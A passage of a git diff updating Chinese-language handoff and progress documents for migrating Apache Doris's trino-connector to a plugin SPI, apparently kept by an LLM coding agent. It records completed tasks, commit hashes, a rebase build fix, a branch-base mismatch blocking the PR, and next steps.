upstream-apache/branch-catalog-spi..HEAD` = **191**(仅顶部 7 个是 P2)。**直接开 `catalog-spi-03 → branch-catalog-spi` 会是 191-commit 的错误巨型 PR**。等用户对齐分支后再开。 +2. **T12 回归测试推迟**(DV-003)——`trino_connector_migration_compat`(CREATE CATALOG→image→重启读回 + 旧 image 含 `TRINO_CONNECTOR` 枚举反序列化),需有 Trino plugin + docker/集群的环境。 --- -## 📝 关键认知 / 临时发现 - -继承前一版认知。**本场新增**: +## ⚠️ 关键认知 / 临时发现 -1. **`tools/check-connector-imports.sh` 是一个隐含的设计约束** — fe-core 不能 import fe-connector 内部类(`org.apache.doris.connector.*`),所以"复用"SPI 实现唯一通道是 `ConnectorPlugin` 接口。批 B 直接 import `JdbcConnectorClient` 替换 `JdbcClient` 本能解法**走不通**——一定要经过 SPI capability 扩展。这条约束以前 P0 文档讲过,但批 B recon 时是第一次真正触发它 -2. **CDC streaming 是 SPI 未覆盖的 use case** — 现有 SPI(ConnectorMetadata.getTable / listTables / getTableHandle)是面向"标准 SELECT"的,没暴露 PK 探测、columns-from-jdbc-driver、replication-slot 校验。P8 启动前需要先在 RFC 中起 §17 章节描述这套扩展,否则 P8 实施会 stall -3. **fe-connector 侧的 `Jdbc*ConnectorClient` 是 P0 阶段 JDBC 迁移的产物** — 它们没有暴露 PK / column-from-driver 接口(按 ConnectorMetadata 标准抽象设计),所以即便允许 fe-core 直接 import 也不能直接替换 legacy client。换言之 SPI 设计本身需要扩展(不只是 "改 import 路径") +1. **rebase 后 fe-core 编译坑(非代码问题)**:本场最大时间消耗。rebase 拉入 `#63823`(nereids 语法从 fe-core 拆到新模块 `fe-sql-parser`)后,`fe-core/target/generated-sources/.../DorisParser.java` 旧生成物残留(git 不管 target/),FQCN 撞名盖过 fe-sql-parser 依赖里的新版 → `LogicalPlanBuilder` 报 `cannot find symbol HOT()/expression()`。**修法:`clean` fe-core**(旧生成物删除、fe-core 已无 grammar 不会再生成)。只 clean fe-sql-parser 不够。任何 rebase 后遇此症状先 clean fe-core,别当代码 bug 查。 +2. **`MetastoreProperties` trino 条目有意保留**:它在 `property/metastore/` 子系统、不引用被删目录、删之不影响编译,但 SPI 建 catalog 可能仍走它解析属性。批 D 不动它;是否死代码留待后续评估(DV-001 后续动作)。 +3. **docs-next 不在本代码仓**:用户向文档在 doris-website 仓(DV-004)。本仓只有 `docs/`。 +4. (沿用)`tools/check-connector-imports.sh` import gate:fe-core 不能 import `org.apache.doris.connector.*`。 +5. (沿用)P1 fallback:`PhysicalPlanTranslator` 里其余 6 个连接器的 instanceof 分支待 P3-P7 各自迁完时删;本场只清了 trino 那一支(T08)。 --- ## 🎯 下一个 session 第一件事 -> P1 已关闭。下一阶段 P2 (trino-connector,2 周)。**预备动作**:先把批 A push + PR,再做 P2 recon。 - ``` -1. git branch --show-current → 确认在 catalog-spi-02 - git status → 应 clean(本场 doc commit 已 push 前提下) - git log --oneline -3 → 应见 2 个本地未推 commit: - a) 批 A scan-node 收口(43a12a05ffe) - b) P1 关闭 + T1 推迟 P8 doc commit -2. 读 PROGRESS.md + 本 HANDOFF + tasks/P1-scan-node-cleanup.md(确认 P1 已 ✅) -3. push + PR(如本场尚未完成): - git push -u origin catalog-spi-02 - gh pr create --repo apache/doris --base branch-catalog-spi \ - --head morningman:catalog-spi-02 \ - --title "[P1-T03-T05] route plugin-driven scans first in nereids translator" -4. 启动 P2 (trino-connector) recon — 用 Explore subagent: - a. fe-core 侧 `datasource/trinoconnector/` 现状(多少类、多少 LOC) - b. fe-connector 侧 trino-connector 模块完成度(连接器看板里目前标 70%) - c. SPI_READY 加进 `CatalogFactory.SPI_READY_TYPES` 的预条件 - d. 反向 instanceof:grep "instanceof.*Trino" in nereids/planner(看板里目前标 0/2) -5. 创建 plan-doc/tasks/P2-trino-connector-migration.md(_template.md 复制) -6. 守门:P2 改动跨 fe-core + fe-connector 双侧,每次 commit 前 - - `mvn -pl fe-connector validate` 触发 check-connector-imports.sh - - `mvn -pl fe-core checkstyle:check` +1. 自检: + git branch --show-current → catalog-spi-03 + git log --oneline -8 → 顶层应是 9bba12a44b2 (T11) → ed81a063fe8 (T08-T10) + → 0fe4b8a93d6 (T07) → 5e504a24883 (doc) → 9ed33f9a7a5 (批 B) + → 69203b6418e (批 A) → 8f0b749bd06 (recon) → 3adabcaf54b (P1) + git status → 干净(本次文档 commit 之后) + +2. 解决 PR base(核心待办): + - git fetch upstream-apache branch-catalog-spi + - 确认 branch-catalog-spi 是否仍停在 778c5dd610f(P1)。 + - 推荐做法:从远端 branch-catalog-spi 拉新分支(如 catalog-spi-03-pr), + cherry-pick 这 7 个 P2 commit(8f0b749bd06 recon → 69203b6418e A → 9ed33f9a7a5 B + → 5e504a24883 doc → 0fe4b8a93d6 C → ed81a063fe8 D → 9bba12a44b2 E)。 + 注意:branch-catalog-spi 没有 fe-sql-parser 拆分(#63823),但我们的改动与之正交, + cherry-pick 后应能编译;在该分支上重跑 fe-core compile + fe-connector-trino test 验证。 + - 或:等 branch-catalog-spi 被刷新到 master 后直接用 catalog-spi-03。 + - PR:gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:<分支> + --title "[feat](connector) P2 trino-connector migration" + +3. T12 回归测试:在有 Trino plugin + docker/集群环境补(DV-003)。 + +4. 之后启动 P3 Hudi 迁移(见 00-master-plan / connectors/hudi.md)。 + 注意 P1-T4 incrementalRelation 是 P3 Hudi SPI 缺口。 ``` --- -## ⚠️ 开放问题 / 风险提示 - -继承前一版;批 B 关闭 1 项、转入 P8 待办 1 项;其余沿用。 - -### 本场关闭 - -- ~~T1 何时实施~~ — 已决:推迟 P8 收尾 - -### 本场新增(P8 待办) - -1. **P8 SPI 扩展:CDC capability 群**:为 streaming CDC 在 SPI 上暴露 `getPrimaryKeys` / `getColumnsFromJdbc` / `listTables`(候选:`ConnectorMetadata` 新 default 方法 + 或 `ConnectorPlugin` 上的 `Optional`);改写 PostgresResourceValidator / StreamingJobUtils / CdcStreamTableValuedFunction 走 SPI;重写 StreamingJobUtilsTest;批量删 13 个 Jdbc*Client + JdbcFieldSchema + 3 个 legacy test。**预估**:~1-2 天 SPI 设计 + ~1 天实施 -2. **P8 启动前 RFC 扩展**:在 `01-spi-extensions-rfc.md` 新增 §17 章节描述 CDC capability 设计;否则 P8 实施会 stall - -### 沿用(保留) - -3. **T4 PluginDrivenScanNode 不支持 hudi 增量场景** — `incrementalRelation` 待 P3 Hudi 迁移时 SPI 扩展 -4. **T2 已推迟到 P4/P5**(用户决议 Q2,2026-05-25) -5. **T3 fallback 保留期跨度长**(P1 → P7 20 周)—— 每连接器在 P3-P7 迁移完成后立即删对应 fallback -6. (沿用 P0)`ColumnDefinition.defaultValue` SPI 缺位 — P5/P6 评估 -7. (沿用 P0)LIST/RANGE `initialValues` flatten 缺位 — P5/P6 评估 -8. (沿用 P0)`PluginDrivenExternalCatalog.createTable` 返回值丢失"已存在"信息 — P5/P6/P7 评估 -9. (沿用 P0)bucket 算法名 `"doris_default"` / `"doris_random"` 占位 — Hive/Iceberg 自己推导 -10. (沿用 P0)Maven build cache 误导;`mvn -pl fe-core` 必须 cwd=`fe/` + `-am`;`-Dtest=` 务必带 `-DfailIfNoTests=false` -11. (沿用 P0)`PluginDrivenTransactionManager.begin(ConnectorTransaction)` 暂无 caller — P5/P6/P7 接通 -12. (沿用 P0)`ConnectorMetaInvalidator.invalidatePartition` fallback 到 invalidateTable;`invalidateStatistics` no-op -13. (沿用 P0)`mvn -pl fe-core test` 不带 `-am` 失败 - ---- - -## 📂 当前关键文件清单 - -### 本场(2026-05-25 白天 ④)修改 - -``` -MOD plan-doc/tasks/P1-scan-node-cleanup.md (元信息 ✅;验收标准重对齐;T1 → 🚫;新增白天 ④ 日志) -MOD plan-doc/PROGRESS.md (P1 → 100% ✅;P2 → 准备启动;§三 T1 翻 🚫;§四加白天 ④) -MOD plan-doc/HANDOFF.md (本文件覆盖更新) -``` +## 📋 P2 commit 节奏(branch `catalog-spi-03`,rebase 到新 master 后) -工作树状态(本场 commit 前): ``` - M plan-doc/tasks/P1-scan-node-cleanup.md - M plan-doc/PROGRESS.md - M plan-doc/HANDOFF.md +9bba12a44b2 [test](connector) [P2-T11] add fe-connector-trino unit tests ← 批 E +ed81a063fe8 [refactor](connector) [P2-T08-T10] remove legacy trino-connector code ← 批 D +0fe4b8a93d6 [feat](connector) [P2-T07] enable trino-connector in SPI_READY_TYPES ← 批 C +5e504a24883 [doc](connector) refresh P2 HANDOFF for batch C kickoff +9ed33f9a7a5 [feat](connector) [P2-T03-T06] bridge trino-connector through fe-core ← 批 B +69203b6418e [feat](connector) [P2-T01-T02] complete trino-connector SPI surface ← 批 A +8f0b749bd06 [doc](connector) P2 trino-connector recon + task breakdown ← 批 0 +3adabcaf54b [P1-T03-T05] route plugin-driven scans first (#63641) ← P1(rebase 后新 hash) ``` -### 待 push 的本地 commit(catalog-spi-02 → upstream-apache/branch-catalog-spi) +本次文档 commit(T13)将追加一条 `[doc](connector) [P2-T13] sync P2 tracking docs`。 -``` -43a12a05ffe [refactor](connector) [P1-T03-T05] route plugin-driven scans first in nereids translator -??????????? [doc](connector) [P1] close P1 — defer T1 to P8, batch A only ← 本场即将创建 -``` - -### P2 (trino-connector) 涉及的目标(recon 时确认) +> ⚠️ 这 7 个 P2 commit 是干净的;问题只在 base(见 §未完成 1)。PR 不要在 base 对齐前开。 -``` -fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/ (待 recon — 看现状) -fe/fe-connector/fe-connector-trino-connector/ (已存在;看板里标 70%) -nereids/glue/translator/PhysicalPlanTranslator.java (T3 fallback 待 P2 完成时清理 trino 分支) -CatalogFactory.SPI_READY_TYPES (P2 末加 "trino-connector" 进白名单) -``` +--- -### 跟踪体系(沿用不变) +## 📂 本场修改 / 新增的关键文件 ``` -plan-doc/ (~225K, 18 文件) -├── 00-connector-migration-master-plan.md / 01-spi-extensions-rfc.md -├── README.md / PROGRESS.md / AGENT-PLAYBOOK.md / HANDOFF.md -├── decisions-log.md (18) / deviations-log.md (0) / risks.md (14) -├── tasks/{_template.md, P0-spi-foundation.md, P1-scan-node-cleanup.md} -└── connectors/{_template.md, jdbc, es, trino-connector, hudi, maxcompute, paimon, iceberg, hive}.md +批 C (0fe4b8a93d6): fe-core/.../datasource/CatalogFactory.java (SPI_READY_TYPES) +批 D (ed81a063fe8): fe-core/.../nereids/glue/translator/PhysicalPlanTranslator.java (删 trino 分支+import) + fe-core/.../datasource/CatalogFactory.java (删 case+import) + fe-core/.../datasource/ExternalCatalog.java (TRINO_CONNECTOR db→PluginDrivenExternalDatabase, DV-001) + 删 fe-core/.../datasource/trinoconnector/ (10 文件) + 删 fe-core/src/test/.../trinoconnector/TrinoConnectorPredicateTest.java +批 E (9bba12a44b2): 新建 fe-connector/fe-connector-trino/src/test/.../trino/ + TrinoPredicateConverterTest.java / TrinoTypeMappingTest.java / TrinoConnectorProviderTest.java +T13: plan-doc/{PROGRESS, tasks/P2, connectors/trino-connector, deviations-log, HANDOFF}.md ``` --- ## 🧠 给下一个 agent 的 meta 建议 -- **分支 `catalog-spi-02`**:本场结束时含 2 个本地未推 commit(批 A scan-node + P1 关闭 doc)。push 与 PR 创建是**风险动作**,必须先与用户确认(已在本场末尾问过;如本场已 push,下场看 `git log --oneline -3` 验证 `origin/catalog-spi-02` 同步) -- **PR 目标分支永远是 `apache/doris:branch-catalog-spi`**(不是 master) -- **commit message** 沿用 `[refactor|feat|doc](connector) [Pn-Tnn] ...` 前缀风格(AGENT-PLAYBOOK §5.4) -- **Maven 命令**:cwd=`fe/`;`mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false`;测试用 `-Dtest=... -DfailIfNoTests=false` -- **P2 启动前必读**:`connectors/trino-connector.md`(连接器看板里目前 70% 完成度)+ Master Plan §3.3 P2 章节 -- **P2 主要工作量预估**:补齐 fe-connector trino-connector 模块剩余 30%(核心是 catalog 注册 + SPI_READY_TYPES);删 fe-core 侧 trino-connector legacy;清掉 T3 fallback 中的 trino 分支(PhysicalPlanTranslator) -- **不要试图删 13 个 Jdbc*Client** — P1 阶段已决议推迟到 P8。看到 legacy jdbc client 不要技痒 +- **分支 `catalog-spi-03`** 现基于 master;**开 PR 前务必先解决 base 错位**(§未完成 1),否则会是 191-commit 错误 PR。 +- rebase 后 fe-core 编译失败先想到 **clean fe-core**(stale DorisParser),别查代码(§关键认知 1)。 +- commit message 沿用 `[feat|refactor|test|doc](connector) [P2-Tnn] ...`。 +- Maven:cwd=`fe/` 或 `-f fe/pom.xml`;`-pl fe-core -am`;`-Dmaven.build.cache.enabled=false`;测试 `-DfailIfNoTests=false`。 +- **不要乱碰 P1 fallback 中 trino 之外的连接器分支**。 +- 偏差先记 `deviations-log.md` 再改文档(本场 DV-001..004 已记)。 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index 518a1cd8cf2fee..fc22aeb7a80ea3 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-05-25** | 当前阶段:**P1 已收口**(in-scope T3+T4+T5 完成;T1 推迟 P8、T2 推迟 P4/P5;待 batch A push + PR)→ **P2 trino-connector 准备启动** | 项目总进度:**20%** +> 最后更新:**2026-06-04** | 当前阶段:**P2 trino-connector 代码完成**(T07–T11,T13 ✅;T12 推迟);PR 待开(分支基线对齐中) | 项目总进度:**30%** > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -10,8 +10,8 @@ | 阶段 | 范围 | 估时 | 进度 | 状态 | 任务文档 | |---|---|---|---|---|---| | **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR #63582 squash-merge `c6f056fa5bd`,T24-T25 流水线全绿)| [tasks/P0](./tasks/P0-spi-foundation.md) | -| **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(in-scope T3+T4+T5 ✅;T1 推迟 P8;T2 推迟 P4/P5;commit `43a12a05ffe` 待 push + PR)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | -| **P2** | trino-connector 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | 🚧 准备启动 | — | +| **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR [#63641](https://github.com/apache/doris/pull/63641) squash-merged `778c5dd610f`;T1 推迟 P8;T2 推迟 P4/P5)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | +| **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 代码完成(T01-T11,T13;T12 推迟;PR 待开) | [tasks/P2](./tasks/P2-trino-connector-migration.md) | | P3 | hudi 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P4 | maxcompute 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -31,7 +31,7 @@ |---|---|---|---|---|---|---|---| | **jdbc** | ✅ | ✅ 100% | ✅ | 🟡 (13 个旧 client,P1 删) | n/a | **95%** | [详情](./connectors/jdbc.md) | | **es** | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/es.md) | -| trino-connector | 🟡 (P0 待完成) | 🟨 70% | ❌ | ❌ | 0/2 | **30%** | [详情](./connectors/trino-connector.md) | +| trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | | hudi | 🟡 | 🟨 50% | ❌ | ❌ | 0/0(寄生 hive) | **20%** | [详情](./connectors/hudi.md) | | maxcompute | 🟡 | 🟨 60% | ❌ | ❌ | 0/12 | **25%** | [详情](./connectors/maxcompute.md) | | paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | @@ -44,6 +44,25 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 +### P2 — trino-connector 迁移(🚧 进行中) +| ID | Task | 批次 | Owner | 状态 | 启动 | 备注 | +|---|---|---|---|---|---|---| +| P2-T01 | `TrinoConnectorProvider.validateProperties` + `TrinoDorisConnector.preCreateValidation` | 批 A | @me | ✅ | 2026-05-25 | required-property check + preCreateValidation 触发 plugin loading;+20 LOC | +| P2-T02 | `ConnectorPushdownOps.applyFilter` + `applyProjection`(桥接 Trino 原生下推) | 批 A | @me | ✅ | 2026-05-25 | `TrinoConnectorDorisMetadata` 复用 `TrinoPredicateConverter`;+125 LOC;单测推 P2-T11 | +| P2-T03 | `GsonUtils` Trino 三处 `registerSubtype` 替换为 `registerCompatibleSubtype` | 批 B | @me | ✅ | 2026-05-25 | **scope 校正**:必须 atomic replace(避免 RuntimeTypeAdapterFactory 撞名 IAE) | +| P2-T04 | `PluginDrivenExternalCatalog.gsonPostProcess` 加 trinoconnector logType migration | 批 B | @me | ✅ | 2026-05-25 | 新 helper `legacyLogTypeToCatalogType`;`name().toLowerCase()` 不通用 | +| P2-T05 | ~~`ExternalCatalog.registerCompatibleSubtype` 注册~~ | 批 B | @me | ✅ | 2026-05-25 | duplicate of T03,自动满足 | +| P2-T06 | `PluginDrivenExternalTable.getEngine() / getEngineTableTypeName()` 加 trino-connector 分支 | 批 B | @me | ✅ | 2026-05-25 | toEngineName 返 null(保留 legacy 行为) | +| P2-T07 | `CatalogFactory.SPI_READY_TYPES` 加 `"trino-connector"` | 批 C | @me | ✅ | 2026-06-04 | commit `0fe4b8a93d6`;翻闸 | +| P2-T08 | `PhysicalPlanTranslator` 删 `instanceof TrinoConnectorExternalTable` 分支 | 批 D | @me | ✅ | 2026-06-04 | commit `ed81a063fe8`;SPI 分支接管 | +| P2-T09 | `CatalogFactory` 删 `case "trino-connector"` + import | 批 D | @me | ✅ | 2026-06-04 | commit `ed81a063fe8` | +| P2-T10 | 删 `datasource/trinoconnector/` 整目录 + legacy test | 批 D | @me | ✅ | 2026-06-04 | commit `ed81a063fe8`;GsonUtils 不碰(批 B 已处理);+ExternalCatalog db case(DV-001)| +| P2-T11 | fe-connector-trino 单元测试 | 批 E | @me | ✅ | 2026-06-04 | commit `9bba12a44b2`;3 类/29 测试;无 mock,json/schema 砍(DV-002)| +| P2-T12 | regression-test `trino_connector_migration_compat`(image 兼容) | 批 E | @me | 🟡 | — | **推迟**(无集群/plugin;DV-003)| +| P2-T13 | 同步跟踪文档 + 开 PR | 批 E | @me | ✅ | 2026-06-04 | 文档已同步;docs-next 不在本仓(DV-004);**PR 待开**(分支对齐)| + +详细任务说明、阶段日志见 [tasks/P2-trino-connector-migration.md](./tasks/P2-trino-connector-migration.md) + ### P1 — scan-node 收口 + 重复清理(✅ 已完成) | ID | Task | 批次 | Owner | 状态 | 启动 | 备注 | |---|---|---|---|---|---|---| @@ -94,6 +113,11 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-04** ✅ **P2 批 C+D+E 完成**(T07–T11,T13;T12 推迟;PR 待开):批 C T07 翻闸(`0fe4b8a93d6`);批 D 删 fe-core legacy trino 代码 14 文件 / −2508(`ed81a063fe8`,含 recon 补回的 `ExternalCatalog` db-case DV-001,保留 MetastoreProperties / 两个 image-compat 枚举 / GsonUtils redirect);批 E T11 加 3 个纯转换器 JUnit5 测试 29 个全绿(`9bba12a44b2`,无 mock,DV-002)。T12 推迟(无集群/plugin,DV-003);T13 文档同步本条。**rebase 构建坑**:fe-core 因 stale 生成的 `DorisParser`(grammar 随 #63823 拆到 `fe-sql-parser`)编译失败,clean fe-core 即解。**PR 待开**——`catalog-spi-03` 现基于 master、与 `branch-catalog-spi`(仍 P1,分叉于 #63552)错位(191-commit),分支对齐由用户处理 +- **2026-05-25(晚 ④)** ✅ **P2 批 B 完成**(T03+T04+T05+T06 fe-core 桥接):recon 揭示 HANDOFF 三处描述误差并校正——(1) T03 不能"只加 redirect 不删旧",必须 atomic replace 否则 `RuntimeTypeAdapterFactory.labelToSubtype` 撞名抛 IAE → FE 起不来;(2) T05 是 duplicate of T03,没有独立的 `ExternalCatalog.registerCompatibleSubtype` API;(3) T04 `name().toLowerCase()` 不通用——`Type.TRINO_CONNECTOR.name().toLowerCase()` 出 "trino_connector" 但 CatalogFactory 期望 "trino-connector",新增 `legacyLogTypeToCatalogType` helper 做显式 case 映射;(4) T06 `TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName()` 返 null(switch 没 case,legacy 也是 null),保留此行为不修。3 files / +29 LOC 全在 fe-core。守门:fe-core compile + checkstyle + import gate 全绿。**重要**:批 B 后到批 C T07 翻闸前,新建 trino 目录无法序列化(registerSubtype 已删但 CatalogFactory 仍走 legacy);不要在中间状态部署 +- **2026-05-25(晚 ③)** ✅ **P2 批 A 完成**(T01+T02 fe-connector-trino SPI 补齐):`TrinoConnectorProvider.validateProperties` 校验 `trino.connector.name` 必填;`TrinoDorisConnector.preCreateValidation` 在 CREATE CATALOG 时触发 `ensureInitialized()` 完成 plugin 加载 + connector factory 解析,把延迟到首次查询的失败前移到 catalog 创建期。`TrinoConnectorDorisMetadata.applyFilter / applyProjection` 桥接 Trino 原生 push-down:复用现有 `TrinoPredicateConverter` 把 `ConnectorExpression` 转 `TupleDomain`,调 Trino `metadata.applyFilter / applyProjection`,把回来的 trino-side `ConnectorTableHandle` 包成新的 `TrinoTableHandle`(保留 column maps);`remainingFilter` 保守返回原表达式,匹配 legacy fe-core 行为(BE 端继续 re-evaluate)。+143 LOC 跨 3 文件,全部 `fe-connector-trino` 侧(**未触碰 fe-core**,严格守批 A 边界);import gate + compile + checkstyle 全绿。单元测试推迟到 P2-T11 批 E 一起做 +- **2026-05-25(晚 ②)** 🚧 **P2 (trino-connector) 启动 + recon 完成**:用 3 路 Explore subagent 并行调研,输出代码侧 facts —— fe-core 旧目录 10 个 .java / ~1760 LOC、5 个 live external caller(全部机械路由,无 P1-T01 那种"活业务逻辑"问题);fe-connector-trino 13 类 / 2162 LOC / 0 测试,SPI 表面 ~95% 已覆盖(真缺 validateProperties / preCreateValidation / pushdown ops);反向 instanceof 实测 1 处(PhysicalPlanTranslator:779);SPI_READY 翻闸点定位 `CatalogFactory.java:53`;Gson 兼容路径与 ES/JDBC 同 pattern 可复用。**用户决议**:Q1 pushdown ops 纳入 P2 批 A;Q2 fe-core 目录删除时 GsonUtils 三个 class-token 注册同步清。**task 划分定**:13 tasks / 5 批次(A SPI 补齐 / B fe-core 桥接 / C 翻闸 / D 清旧 / E 测试+文档)。P2 task 文件 [tasks/P2-trino-connector-migration.md](./tasks/P2-trino-connector-migration.md) 已建 +- **2026-05-25(晚)** ✅ **P1 PR 合入**:PR [#63641](https://github.com/apache/doris/pull/63641) `[P1-T03-T05] route plugin-driven scans first in nereids translator` 流水线全绿,squash-merged 到 `apache/doris:branch-catalog-spi`,hash `778c5dd610f`。本地新分支 `catalog-spi-03` 已建立,承载 P2 工作 - **2026-05-25(白天 ④)** ✅ **P1 阶段关闭**:批 B (T1) recon 揭示 3 个 fe-core JDBC client caller(PostgresResourceValidator / StreamingJobUtils / CdcStreamTableValuedFunction)均为活的 CDC streaming 代码(非 dead code),删除需要在 ConnectorPlugin/ConnectorMetadata 上为 CDC 暴露新 capability(getPrimaryKeys / getColumnsFromJdbc / listTables)。用户决议(Q4):**推迟 T1 到 P8 收尾**(与 streaming CDC 重构一起做)。P1 in-scope(T3+T4+T5)100% 完成;剩余动作:batch A push + PR - **2026-05-25(白天 ③)** ✅ **P1 批 A 完成**(T03+T04+T05 scan-node SPI 收口):`PhysicalPlanTranslator.visitPhysicalFileScan` `PluginDrivenExternalTable` 分支前置(T3);`visitPhysicalHudiScan` 加 SPI 分支并通过 `FileQueryScanNode` setters 透传 `scanParams`/`tableSnapshot`,`incrementalRelation` 记 P3 TODO(T4);`LogicalFileScan.computeOutput` 新增 `computePluginDrivenOutput()` helper + 显式 `supportPruneNestedColumn → false` 分支(T5)。fe-core BUILD SUCCESS + checkstyle 0;对当前 SPI 表(JDBC/ES)行为等价;7 个连接器特定分支原地保留作 P3-P7 fallback - **2026-05-25** ✅ **P0 全阶段完成**:PR [#63582](https://github.com/apache/doris/pull/63582) squash-merge 到 `apache/doris:branch-catalog-spi`(hash `c6f056fa5bd`);T24/T25 流水线全绿;P0 阶段进度 100%。新本地分支 `catalog-spi-02` 基于最新 base 创建,**P1 启动**(scan-node 收口 + 重复清理,1 周) @@ -141,9 +165,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:P1 批 A (T3+T4+T5) commit `43a12a05ffe`(local,未 push)→ 批 B (T1) recon 揭示 callers 非 dead code → 用户决议 T1 推迟 P8 → P1 阶段关闭 → 跟踪文档(P1 task / PROGRESS / HANDOFF)全部同步 -- **下一个 session 应做**:(1)push `catalog-spi-02` 到 morningman fork;(2)`gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:catalog-spi-02`;(3)启动 P2 (trino-connector) recon -- **是否需要 handoff**:是,已写新 [HANDOFF.md](./HANDOFF.md) +- **本 session 已完成**:P2 批 C(T07 翻闸 `0fe4b8a93d6`)+ 批 D(T08-T10 删 legacy `ed81a063fe8`)+ 批 E(T11 单测 `9bba12a44b2`)+ T13 文档同步。T12 推迟。本地 fe-core + fe-connector-trino 全绿(compile / test-compile / checkstyle / import-gate)。DV-001..004 已记 +- **下一个 session 应做**:(1) 解决 PR base 错位——`catalog-spi-03` 现基于 master,需从远端 `branch-catalog-spi` 拉新分支 cherry-pick 7 个 P2 commit 后开 PR;(2) T12 回归测试在有集群/plugin 的环境补;(3) 之后启动 P3 Hudi 迁移 +- **是否需要 handoff**:**是**——用户准备开新 session 跑批 C;本场已 rewrite [HANDOFF.md](./HANDOFF.md)(含 batch B→C regression window 警告 + T07/T08/T09/T10 详细 step-by-step) - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/connectors/trino-connector.md b/plan-doc/connectors/trino-connector.md index 2ba1fb6c3662af..0e55a0e4b3e98c 100644 --- a/plan-doc/connectors/trino-connector.md +++ b/plan-doc/connectors/trino-connector.md @@ -11,29 +11,31 @@ | **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/` | | **共享依赖** | 无 | | **计划迁移阶段** | **P2**(首个完整 playbook 实施) | -| **当前状态** | ⏸ 未启动(P0/P1 完成后启动) | -| **完成度** | 30% | -| **主 owner** | TBD(P2 启动前指派) | +| **当前状态** | ✅ P2 代码完成(legacy 已从 fe-core 移除,查询走 SPI);PR 待开(分支基线对齐) | +| **完成度** | **100%**(代码;PR 待开,T12 回归测试推迟到有集群/plugin 环境) | +| **主 owner** | @me | --- ## 迁移 Playbook 进度 +> Recon 后实测(2026-05-25):fe-core 旧目录 10 个 .java;反向 instanceof 实际 1 处(dashboard "2" 为过时数字)。 + | 步骤 | 状态 | 备注 | |---|---|---| -| 1 | 🟡 | fe-core 旧路径下 6 个顶层类 + `source/`(4 个) | -| 2 | 🟡 | fe-connector 已有 13 个类:Provider/Metadata/ScanPlanProvider/Predicate/PluginManager/...| -| 3 | ⏳ | 反向 instanceof:2 处(仅 `PhysicalPlanTranslator` 与 `LakeSoulScanNode` 附近)| -| 4 | 🟡 | 大部分 ConnectorMetadata 方法已实现,需要核对边界 | -| 5 | ⏳ | validateProperties / preCreateValidation 待补 | -| 6 | ✅ | META-INF/services 已注册 | -| 7 | ⏳ | `SPI_READY_TYPES` 未加 | -| 8 | ⏳ | gsonPostProcess 未加 trinoconnector → plugin 迁移 | -| 9 | ⏳ | registerCompatibleSubtype 未注册 | -| 10 | ⏳ | 替换 2 处反向 instanceof | -| 11 | ⏳ | PhysicalPlanTranslator 删 `TrinoConnectorExternalTable` 分支 | -| 12 | ⏳ | 0 个测试 → 需要补 | -| 13 | ⏳ | 删 `datasource/trinoconnector/` | +| 1 | 🟡 | fe-core 旧路径 10 个 .java / ~1760 LOC(TrinoConnectorExternalCatalog 329 / Scan 342 / PredicateConverter 334)| +| 2 | 🟡 | fe-connector 已有 13 个类 / 2162 LOC:Provider/Metadata/ScanPlanProvider/Predicate/PluginManager/Bootstrap/TypeMapping/Json/3 个 Handle | +| 3 | ⏳ | 反向 instanceof:**1 处**(PhysicalPlanTranslator:779 — P1 批 A 已加 SPI fallback 在它之上,待 P2-T08 删除)| +| 4 | 🟢 | ConnectorMetadata 方法 ~95% IMPL/DEFAULT;DDL 类(createTable/dropTable)DEFAULT throws 是合理的(Trino 此路径 read-only)| +| 5 | ✅ | validateProperties / preCreateValidation done(P2-T01;commit `31fb91c5bd3`)| +| 6 | ✅ | META-INF/services 已注册 `TrinoConnectorProvider` | +| 7 | ✅ | `SPI_READY_TYPES` 加 `"trino-connector"`(P2-T07;commit `0fe4b8a93d6`)| +| 8 | ✅ | gsonPostProcess 加 trinoconnector → plugin 迁移 + helper `legacyLogTypeToCatalogType`(P2-T04;commit `dfd48725c76`)| +| 9 | ✅ | registerCompatibleSubtype 已 atomic-replace Trino 三处旧 class-token(P2-T03;commit `dfd48725c76`;T10 不再碰 GsonUtils)| 